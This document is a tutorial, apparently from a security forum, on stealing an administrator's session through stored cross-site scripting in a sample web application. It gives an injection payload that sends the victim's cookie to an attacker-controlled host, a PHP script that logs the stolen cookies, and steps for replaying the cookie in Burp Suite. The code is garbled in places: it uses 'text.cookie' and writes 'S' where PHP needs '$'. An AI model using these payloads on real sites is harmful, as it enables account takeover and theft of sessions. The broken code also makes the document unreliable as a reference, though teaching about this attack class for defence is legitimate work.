By way of illustration, let us consider a standard web application login page. Through this login interface, both regular users and administrative users can gain access to the application.
The web application offers identical functionality to both user categories, ensuring that what is visible to a regular user mirrors what an administrator perceives. The primary aim of this post is to exemplify the practical execution of session hijacking. Consequently, we shall proceed to delve deeper into the application to identify vulnerabilities that will aid us in achieving our objective.
1.- Solely one function is accessible to all users, namely "Enter your data"; hence, let us proceed to examine this feature. Upon utilising this function, it becomes apparent that any data input is retained by the web application and subsequently displayed on the screen through the "Show data" feature. This scenario presents a potential vulnerability to stored XSS exploitation.
2.- To assess the vulnerability of the web application, we shall inject "><xss>” and scrutinise the source via "Show Data". Evidently, the web application fails to filter HTML special characters, rendering it susceptible to stored cross-site scripting attacks.
3.- We can now formulate a strategy to execute a session hijacking attack on this web application, with the objective of gaining access to the administrative panel of the application.
4.- By injecting
Code: Select all
<script>var a=new Image();a.src=”http://theattackerIPaddress/stealer.php?cmd=”+text.cookie</script>into the data input field, we can anticipate the moment when the admin user views the entered data, thereby enabling us to acquire their session cookie. The script "stealer.php" residing on the attacker's IP address contains the subsequent code:
<?php
if (isset($_REQUEST["cmd"]))
{
Sf=fopen("stolen.txt", "w+");
fwrite(Sf,S_REQUEST["cmd"]."<br>");
fclose(Sf);
}
5.- Subsequently, we inject the script mentioned above into the data entry field and await the moment when the admin user reviews the inputted data. Upon the admin user's interaction with the displayed data, the attacker will receive the following information in "stolen.txt" located on their attacking IP address:
PHPSESSID=aamckhi9852n76lsdp10bher41<br>
6.- Presently, we can employ Burp Suite to utilise this session for accessing the admin panel. By intercepting the request and incorporating the pilfered session cookie, we can manipulate the request accordingly. Upon forwarding this modified request, we effectively hijack the admin user's session.